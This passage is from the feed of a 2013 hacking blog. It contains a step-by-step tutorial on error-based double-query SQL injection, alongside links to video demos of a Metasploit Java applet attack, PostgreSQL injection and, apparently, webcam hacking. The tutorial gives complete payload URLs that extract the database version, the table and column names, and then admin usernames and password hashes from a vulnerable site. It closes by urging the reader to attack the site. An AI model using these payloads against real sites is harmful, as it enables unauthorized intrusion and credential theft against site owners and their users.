src=&quot;http://3.bp.blogspot.com/--TYR4Fl4dG4/UUxbe-C_M6I/AAAAAAAAAF8/gI9026vFrVE/s1600/images.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Superb demo by Blackleets Team Member &quot;Zahid Adeel&quot; on &lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;metasploit java signed applet attack on WAN using PTCL router ..!! This time he&#39;s not gonna attack on LAN but WAN Internet attack Here is the video below. Enjoy ;)&lt;/b&gt;&lt;/span&gt;          &lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;object class=&quot;BLOGGER-youtube-video&quot; classid=&quot;clsid:D27CDB6E-AE6D-11cf-96B8-444553540000&quot; codebase=&quot;http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0&quot; data-thumbnail-src=&quot;http://img.youtube.com/vi/TbeAMnscYtg/0.jpg&quot; height=&quot;266&quot; width=&quot;320&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://youtube.googleapis.com/v/TbeAMnscYtg&amp;source=uds&quot; /&gt;&lt;param name=&quot;bgcolor&quot; value=&quot;#FFFFFF&quot; /&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot; /&gt;&lt;embed width=&quot;320&quot; height=&quot;266&quot;  src=&quot;http://youtube.googleapis.com/v/TbeAMnscYtg&amp;source=uds&quot; type=&quot;application/x-shockwave-flash&quot; allowfullscreen=&quot;true&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;h2 class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;&lt;h2 class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;If video is not playing Here is the link:&lt;/span&gt;&lt;/h2&gt;&lt;h2 class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;&lt;h2 class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;Direct to youtube:&lt;/span&gt;&lt;/h2&gt;&lt;h2 class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&amp;nbsp;&lt;a href=&quot;http://adf.ly/L6jTC&quot; target=&quot;_blank&quot;&gt;Click Here&lt;/a&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&amp;nbsp;&lt;/span&gt; &lt;/h2&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/2139461283499346609/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/03/metasploit-java-applet-attack-on-wan.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/2139461283499346609'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/2139461283499346609'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/03/metasploit-java-applet-attack-on-wan.html' title='Metasploit java applet attack on WAN (Internet) By Zahid Adeel'/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/--TYR4Fl4dG4/UUxbe-C_M6I/AAAAAAAAAF8/gI9026vFrVE/s72-c/images.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-8086944890424830758</id><published>2013-03-18T16:35:00.003+05:00</published><updated>2013-03-22T18:25:29.256+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="sql injection"/><category scheme="http://www.blogger.com/atom/ns#" term="sql injection double query eror based"/><category scheme="http://www.blogger.com/atom/ns#" term="web hacking"/><title type='text'> sql injection (double query eror based) by Ment@l Mind</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-mI0HNw_L4-k/UUxbwHVXfnI/AAAAAAAAAGE/06HYTtGQG_k/s1600/sql_img.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-mI0HNw_L4-k/UUxbwHVXfnI/AAAAAAAAAGE/06HYTtGQG_k/s1600/sql_img.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;*** sql injection (double query eror based)***&lt;br /&gt;&lt;br /&gt;ASLAM O ALAIKUM&lt;br /&gt;&lt;br /&gt;Ment@l Mind Here !!&lt;br /&gt;&lt;br /&gt;Today i will teach you how can we use sql injection(double query)&lt;br /&gt;&lt;br /&gt;so for this first you need vuln site..&lt;br /&gt;&lt;br /&gt;ok after getting a vuln site as a normal you get the column counts&lt;br /&gt;&lt;br /&gt;suppose it has 4 columns so next your comand will be&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;b&gt;www.vulnsite.com/index.php?id=-12 union select 1,2,3,4--&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;but when you press enter it gives eror :-0&lt;br /&gt;&lt;br /&gt;the eror is&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;(select statment have diffrent numbers of column)&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;so now what??&lt;br /&gt;&lt;br /&gt;dont be cunfused its time for using double query sql injection&lt;br /&gt;&lt;br /&gt;so your command will look like this:-&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;www.site.com/index.php?id=-12+and+(select+1+from(select%0Acount(*),concat((select+concat(version())&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;a+from+information_schema.tables+group+by+a)b)&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;and result will look like this&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&quot;Duplicate entry &#39;5.0.92-community-log1&#39; for key 1&quot;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;so here &#39;5.0.92-community-log1&#39; is sites version.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;now we have to find sites current_user so our command will be:-&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;www.site.com/index.php?id=-12+and+(select+1+from(select%0Acount(*),concat((select+concat(current_user())&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;a+from+information_schema.tables+group+by+a)b)&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;br /&gt;result&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&quot;Duplicate entry user+localhost1&#39; for key 1&quot;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;br /&gt;ok now we will find tables name so our command will be:-&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;www.site.com/index.php?id=-12+and+(select+1+from(select%0Acount(*),concat((select+concat(table_name)&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;a+from+information_schema.tables+group+by+a)b)&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;result will be&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&quot;duplicate entry &#39;table_name1&#39; for key 1&#39;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;now keep incresing the limit you can find it near&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;((table_name)+from+information_schema.tables+limit+0,1) )&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&quot;here change the limit &#39;0,1&#39;to 1,1 then 2,1 untill you get the eror..&quot;&quot;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;br /&gt;ok now we will find tables which contains the data so our command will be:-&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;www.site.com/index.php?id=-12+and+(select+1+from(select%0Acount(*),concat((select+concat(table_name)&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;+from+information_schema.tables+where+table_schema=database()+limit+0,1),&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;result&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&quot;duplicate entry tablename1&#39; for key 1&quot;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;so here again increase the limits value untill you get the table like auth,,user,,admin,,login etc&lt;br /&gt;&lt;br /&gt;ok now suppose we have table name &quot;user&quot; so next step is to find columns of this table our command will be:-&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;b&gt;www.site.com/index.php?id=-12+and+(select+1+from(select%0Acount(*),concat((select+concat(column_name)&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;b&gt;+from+information_schema.columns+where+table_name=&amp;lt;hex value of table&amp;gt;+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;result&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&quot;Duplicate entry &#39;column name1&#39; for key 1&#39;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;again keep changing limits value untill you get columns like username,password&lt;br /&gt;&lt;br /&gt;ok now we have columns username and password we need tha data inside the columns so our command will be:-&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;www.site.com/index.php?id=-12+and+(select+1+from(select%0Acount(*),concat((select+concat(username,0x3a,password)&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;+from+user+limit+0,1),floor(Rand(0)*2))a&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;+from+information_schema.tables+group+by+a)b)&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;result&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&quot;Duplicate entry &#39;admin:3d145b6d4827e1f25994a3da418419e41&#39; for key 1&quot;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;now you have user and pass you can fuck the site ;)&lt;br /&gt;&lt;br /&gt;sorry for my bad english.. hope it will help you&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;EXAMPLE OF SQL DOUBLE QUERY EROR BASED:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-EbFjo6qnHnQ/UUb5u-eWdLI/AAAAAAAAAEE/IoKiCLO7GYM/s1600/376390_180182482077636_1254219141_n.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;256&quot; src=&quot;http://1.bp.blogspot.com/-EbFjo6qnHnQ/UUb5u-eWdLI/AAAAAAAAAEE/IoKiCLO7GYM/s320/376390_180182482077636_1254219141_n.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/8086944890424830758/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/03/sql-injection-double-query-eror-based.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/8086944890424830758'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/8086944890424830758'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/03/sql-injection-double-query-eror-based.html' title=' sql injection (double query eror based) by Ment@l Mind'/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-mI0HNw_L4-k/UUxbwHVXfnI/AAAAAAAAAGE/06HYTtGQG_k/s72-c/sql_img.jpg" height="72" width="72"/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-6067565510244235210</id><published>2013-03-17T21:55:00.000+05:00</published><updated>2013-03-22T18:26:21.064+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="sql injection"/><category scheme="http://www.blogger.com/atom/ns#" term="web hacking"/><title type='text'>PostgreSQL injection by cep</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-mI0HNw_L4-k/UUxbwHVXfnI/AAAAAAAAAGI/ESaorWL4ABY/s1600/sql_img.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/-mI0HNw_L4-k/UUxbwHVXfnI/AAAAAAAAAGI/ESaorWL4ABY/s1600/sql_img.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;color: red; font-size: large;&quot;&gt;&lt;b&gt;So here i have video demo of postgre sql injection video demo. i hope this will help you alot just enjoy this video here is the link below to download from mediafire:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red; font-size: x-large;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;Direct Download Link:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: red; font-size: x-large;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;a href=&quot;http://www.mediafire.com/?vgy73v5rlyllruk&quot; target=&quot;_blank&quot;&gt;Click Here&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;Greetz: CEP&amp;nbsp;&lt;/span&gt;&lt;/span&gt; &lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/6067565510244235210/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/03/postgresql-injection-by-cep.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/6067565510244235210'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/6067565510244235210'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/03/postgresql-injection-by-cep.html' title='PostgreSQL injection by cep'/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-mI0HNw_L4-k/UUxbwHVXfnI/AAAAAAAAAGI/ESaorWL4ABY/s72-c/sql_img.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-6816319817384095066</id><published>2013-03-17T20:34:00.000+05:00</published><updated>2013-03-22T18:28:16.318+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="computer hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="web cam hacking"/><title type='text'>Hacking Victim&#39;s Web Cam (Video Demo by S.O.G)</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a 